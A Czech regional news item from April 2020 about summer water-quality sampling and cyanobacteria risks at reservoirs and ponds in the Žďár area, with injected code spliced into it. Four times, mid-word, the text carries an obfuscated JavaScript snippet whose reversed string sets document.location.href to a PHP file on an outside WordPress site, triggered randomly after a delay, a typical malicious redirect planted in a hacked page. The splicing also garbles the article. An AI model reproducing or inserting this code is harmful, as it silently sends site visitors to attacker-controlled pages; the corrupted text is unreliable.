Rainbow page separator

Hygienici začnou sledovat kvalitu vody v první polovině června

Čtvrtek, 30. dubna 2020

Žďársko / V pravidelných čtrnáctidenních intervalech budou i v le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošní letní sezoně probíhat odběry a následné vyhodnocení kvality vody ve vodních nádržích, které lidé s oblibou využívají ke koupání. Na Žďársku opět půjde o Pilskou nádrž, rybníky Velké Dářko, Medlov, Domanínský a Sykovec a novoměstské Koupaliště.
Hygienici z krajské hygienické stanice budou vzorky vody pro tes[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tování ve zmíněných nádržích poprvé odebírat 8. června, další termíny jsou pak stanoveny na 22. června, 7. července, 20. července, 3. srpna a 17. srpna. Za předpokladu, že výsledky rozborů vody prokážou zejména výrazné překročení limitů pro výskyt sinic a zvýšené množství chlorofylu, kontroly mohou být i mimo moni[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torovací kalendář četnější, a [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to jednou za pět až devět dní.
Nejčastějšími onemocněními, která sinice způsobují, jsou střevní a žaludeční potíže, záněty uší a očí. Největší riziko zdravotních komplikací po koupání hrozí těhotným ženám, alergikům a obecně lidem s oslabeným imunitním systémem.